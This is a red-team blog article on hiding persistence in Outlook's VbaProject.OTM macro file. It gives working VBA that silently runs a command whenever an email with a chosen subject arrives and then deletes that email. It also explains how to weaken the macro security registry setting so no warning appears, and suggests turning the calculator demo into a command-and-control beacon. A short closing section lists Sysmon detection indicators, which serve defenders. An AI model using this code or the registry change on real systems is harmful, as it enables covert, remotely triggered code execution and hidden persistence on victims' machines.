In this article, we focus on analyzing the Outlook persistence technology we recently discovered. So far, this technology has not been paid attention to by too many blue teams.
The use of low-privileged users to establish persistence technology in the user space is often very valuable, because there are far more scenarios like this than scenarios with elevated privileges. Therefore, we continue to research some new technologies that are not widely documented and may not be monitored by the blue team. Last year, we published 3 persistence-related articles, and in this article, we continue to discuss persistence technology, focusing on the analysis of the Outlook persistence technology we recently discovered. So far, this technology has not been paid attention to by too many blue teams.
Previously, many researchers have conducted research on the topic of Outlook-based persistence, including Dave Hartley and Nick Landers, who have introduced in detail how to use Outlook rules to achieve persistence.
In this article, we will focus on using Outlook’s VbsProject.OTM file to achieve similar results. Although the technology has not spread too widely, Cobalt Kitty has previously used it for command and control channels.
Like most Microsoft Office product suites, Outlook can enable the “Developer” tab and create VBA-based macros through the VB editor. We open the editor and create a simple macro to find an Outlook specific module named “ThisOutlookSession”.
After saving the macro, Outlook will create the VbaProject.OTM file in the %APPDATA%\Roaming\Microsoft\Outlook directory.
However, if we try to execute the macro with the default configuration, a failure prompt will appear because the default configuration is set to “provide notifications for digitally signed macros, and disable all other macros”.
However, we can modify this configuration by using the following values to create a Security registry key.
In the macro security configuration, the Level value is defined as follows:
4 = No notification is provided, all macros are disabled
3 = Provide notification for digitally signed macros, disable all other macros
2 = Provide notifications for all macros
1 = enable all macros
To allow macros to run in a hidden manner without notifying the user, we may need to set the Level value to 1, and enable all macros during operation.
Checking the VbaProject.OTM file, we found that it is a standard Microsoft Compound Document File (CDF):
[email protected] ~ ✗ file ~/VbaProject.OTM
VbaProject.OTM: Composite Document File V2 Document, Cannot read section info
Using oledump.py to further analyze it, you can find the OLE stream containing the macro code:
[email protected] ~ ✗ python oledump.py ~/VbaProject.OTM 1: 43 'OutlookProjectData' 2: 388 'OutlookVbaData/PROJECT' 3: 59 'OutlookVbaData/PROJECTwm' 4: M 6156 'OutlookVbaData/VBA/ThisOutlookSession' 5: 2663 'OutlookVbaData/VBA/_VBA_PROJECT' 6: 497 'OutlookVbaData / VBA / dir'
At this point, we now know that VbaProject.OTM is a standard document that enables OLE macros, so the traditional tools and techniques for creating, obfuscating, purging, and reloading these files are still applicable. When we deliver it to disk, we may need to ensure its static security.
Next, let us take a closer look at how to use it as a weaponized persistence tool.
In order to make VBA code execution more meaningful, the code needs to be executed as a result of an event. The ThisOutlookSession module allows us to subscribe to many different events in Outlook, which will lead to different opportunities to implement code execution.
Discussed here is the persistence method, which may involve certain events driven by the user (for example: opening Outlook) or certain events determined by the attacker (for example: receiving a specific email). Here, we will focus on the latter and explain how to implement arbitrary VBA execution using emails with specific topics.
In order to determine when to receive new emails, we can first subscribe to the events of the default inbox when Outlook starts, using the following methods. First, when registering for an event, set variables for the default inbox folder (olInboxItems).
Option Explicit Private WithEvents olInboxItems As Items Private Sub Application_Startup() Set olInboxItems = Session.GetDefaultFolder(olFolderInbox).Items End Sub
Then, using the user’s reference to the inbox, we can use the “ItemAdd” callback function to receive events when new mail is received:
Private Sub olInboxItems_ItemAdd(ByVal Item As Object) End Sub
Specifically, we are only interested in received emails, so we can optimize the callback so that it only triggers when new emails are received. This can be achieved by verifying the entry to confirm whether its type is “MailItem”.
Private Sub olInboxItems_ItemAdd(ByVal Item As Object) If TypeOf Item Is MailItem Then MsgBox "You have mail" End If End Sub
Of course, we don’t want to execute it every time we receive an email, so we can use specific conditions to filter the received emails, including sender address, subject, body content, etc. Here, the above code is extended. When an email with a specific subject (MailItem.Subject) is received, the code is executed, and then the email is deleted using the MailItem.Delete method.
Private Sub olInboxItems_ItemAdd(ByVal Item As Object) On Error Resume Next Dim olMailItem As MailItem If TypeOf Item Is MailItem Then If InStr(olMailItem.Subject, "MDSec") > 0 Then MsgBox "Hack The Planet" olMailItem.Delete End If End If Set Item = Nothing Set olMailItem = Nothing End Sub
Combine the above codes together and finally pop up the calculator.
Option Explicit Private WithEvents olInboxItems As Items Private Sub Application_Startup() Set olInboxItems = Session.GetDefaultFolder(olFolderInbox).Items End Sub Private Sub olInboxItems_ItemAdd(ByVal Item As Object) On Error Resume Next Dim olMailItem As MailItem If TypeOf Item Is MailItem Then If InStr(olMailItem.Subject, "MDSec") > 0 Then MsgBox "Hack The Planet" Shell "calc.exe" olMailItem.Delete End If End If Set Item = Nothing Set olMailItem = Nothing End Sub
Demo video: https://vimeo.com/482370663
The pop-up calculator is just a proof of concept. In fact, a beacon can be generated by weaponization. The specific implementation is left for readers to try.
Demo video: https://vimeo.com/482376266
From the perspective of terminal security, the technology can be tested through the following two key indicators:
1. Monitoring the creation and modification events of %APPDATA%\Roaming\Microsoft\Outlook\VbaProject.OTM file (Sysmon event ID 11);
2. Monitoring the creation and modification events of the registry HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security key and Level value (Sysmon event ID 12).